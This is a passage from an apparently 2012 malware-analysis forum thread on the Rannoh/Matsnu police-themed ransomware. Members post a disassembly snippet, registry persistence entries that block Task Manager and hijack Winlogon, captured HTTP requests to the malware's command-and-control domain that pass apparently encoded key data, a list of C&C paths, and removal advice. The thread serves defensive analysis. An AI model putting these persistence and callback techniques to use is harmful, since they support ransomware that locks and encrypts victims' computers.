A forum for reverse engineering, OS internals and malware analysis 

Trojan Ransom / FakePoliceAlert

Forum for analysis and discussion about malware.

Re: Trojan Ransom / FakePoliceAlert

 #13437  by thisisu
 Sat May 26, 2012 2:56 pm
Xylitol wrote:
Code: Select all
0040103F  |> /6A 00         /PUSH 0                                  ; /Style = MB_OK|MB_APPLMODAL
00401041  |. |68 9F354000   |PUSH 40359F                             ; |Title = "Please bitchz, I'm fabulous"
00401046  |. |68 BB354000   |PUSH 4035BB                             ; |Text = "I love u Xylitol"
0040104B  |. |68 28FCFFFF   |PUSH -3D8                               ; |hOwner = FFFFFC28
00401050  |. |E8 1D000000   |CALL 00401072                           ; \MessageBoxA
what the...
rofl :lol:

Looks like it encrypts files too. Not sure of the encryption method used. Probably new.

Lock screen seems very similar to Gendarmerie France.
If using FRST to get back into Windows, fixlist.txt will look something like this:
Code: Select all
HKU\thisisu\...\Run: [B49EB6EB] C:\Documents and Settings\thisisu\Application Data\Lannnnnnfn\C51A1E85B49EB6EB8528.exe [34477 2012-05-26] (The Code::Blocks Team)
HKU\thisisu\...\Policies\system: [DisableRegistryTools] 1
HKU\thisisu\...\Policies\system: [DisableRegedit] 1
HKU\thisisu\...\Policies\system: [DisableTaskMgr] 1
HKLM\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\473F756CB49EB6EB3793.exe, [34477 2012-05-26] (The Code::Blocks Team)
IMEO\msconfig.exe: [Debugger] P9KDMF.EXE
IMEO\regedit.exe: [Debugger] P9KDMF.EXE
IMEO\taskmgr.exe: [Debugger] P9KDMF.EXE
2012-05-26 14:51 - 2012-05-26 14:51 - 0034477 ___AH (The Code::Blocks Team) C:\Windows\System32\473F756CB49EB6EB3793.exe
2012-05-26 14:51 - 2012-05-26 14:51 - 0000000 ____D C:\Documents and Settings\thisisu\Application Data\Lannnnnnfn
2012-05-26 14:51 - 2012-05-12 02:50 - 0481078 ____A C:\Windows\System32\winsh323
2012-05-26 14:51 - 2012-05-12 02:50 - 0481078 ____A C:\Windows\System32\winsh322
2012-05-26 14:51 - 2012-05-12 02:50 - 0481078 ____A C:\Windows\System32\winsh321
2012-05-26 14:51 - 2012-05-12 02:50 - 0481078 ____A C:\Windows\System32\winsh320
2012-05-26 14:51 - 2012-04-26 23:38 - 0481078 ____A C:\Windows\System32\winsh325
2012-05-26 14:51 - 2012-04-26 23:37 - 0481078 ____A C:\Windows\System32\winsh324

Re: Trojan Ransom / FakePoliceAlert

 #13551  by frame4-mdpro
 Wed May 30, 2012 7:56 pm
Buster_BSA wrote:
thisisu wrote:If using FRST to get back into Windows, fixlist.txt will look something like this:
What is FRST?
Farbar Recovery Scan Tool, or FRST, is a portable application designed to run in the Windows Vista and Windows 7 Recovery Environment in order to diagnose and fix boot issues. This tool can also be used in Windows XP if the system can boot to Recovery Environment by using a PE Boot CD.

http://www.bleepingcomputer.com/downloa ... scan-tool/
http://www.bleepingcomputer.com/forums/topic454545.html

Re: Trojan Ransom / FakePoliceAlert

 #13675  by Xylitol
 Sun Jun 03, 2012 8:06 pm
Rannoh
3/42 >> https://www.virustotal.com/file/2c520ad ... /analysis/
Code: Select all
GET /888/a.php?id=8065D52C494C59584F54&cmd=img HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: makase66makase.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
---
GET /888/a.php?id=8065D52C494C59584F54&cmd=key&data=2:0:MDEyMzQ1Njc4OTU3OTYyNA== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: makase66makase.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
---
GET /888/a.php?id=8065D52C494C59584F54&stat=240 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: makase66makase.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
---
GET /888/a.php?id=8065D52C494C59584F54&cmd=geo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: makase66makase.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
---
GET /888/a.php?id=8065D52C494C59584F54&cmd=lfk&data=FEpDuv7%2FHPWHEkT5rQZKttYHU3juuEa2tNrg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: makase66makase.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Image

• dns: 1 ›› ip: 188.190.98.113 - adresse: MAKASE66MAKASE.COM
makase66makase.com/888/
makase66makase.com/888/flag/
makase66makase.com/888/libs/
makase66makase.com/888/geoip/

makase66makase.com/111/ (Probably a failed C&C)
Code: Select all
Warning: require_once(libs/config.php) [function.require-once]: failed to open stream: No such file or directory in /home/admin/domains/main.com/public_html/111/index.php on line 5
Fatal error: require_once() [function.require]: Failed opening required 'libs/config.php' (include_path='.:/usr/local/lib/php') in /home/admin/domains/main.com/public_html/111/index.php on line 5
Other C&C:
makase66makase.com/222/
makase66makase.com/333/
makase66makase.com/444/
makase66makase.com/555/
makase66makase.com/666/
makase66makase.com/777/
makase66makase.com/999/
makase66makase.com/admin/ (???)
makase66makase.com/admin/geo.php
makase66makase.com/admin/define.php
makase66makase.com/admin/func.php
Attachments
infected
(43.34 KiB) Downloaded 69 times

Re: Trojan Ransom / FakePoliceAlert

 #13844  by Quads
 Sat Jun 09, 2012 7:46 pm
Has anyone worked out how to get around the likes of the West Yorkshire Police variant on an XP machine when there is no Safe Modes??

Quads

Re: Trojan Ransom / FakePoliceAlert

 #13845  by Kafeine
 Sat Jun 09, 2012 8:08 pm
Quads wrote:Has anyone worked out how to get around the likes of the West Yorkshire Police variant on an XP machine when there is no Safe Modes??

Quads
This :
Image
(click to enlarge)
Can only give you a name : Rannoh/Matsnu, but could help you find an answer.

Re: Trojan Ransom / FakePoliceAlert

 #13846  by Quads
 Sat Jun 09, 2012 8:14 pm
I have 2 users who have it and I know what I am looking at, but their desktops are locked with the Ransomware on XP machines with no Safe Modes.

Vista and Win7 use FRST but with XP nope.

Quads

Re: Trojan Ransom / FakePoliceAlert

 #13847  by Quads
 Sun Jun 10, 2012 12:28 am
Not even the DrWEB live CD would work.

managed to get OTLPE to work log attached

Winlogon, better make sure that userinit.exe is still actually in the System32 folder before trying to fix the Winlogon registry key

Quads
Attachments
(93.9 KiB) Downloaded 47 times
  • 1
  • 5
  • 6
  • 7
  • 8
  • 9
  • 14
 Return to “Malware”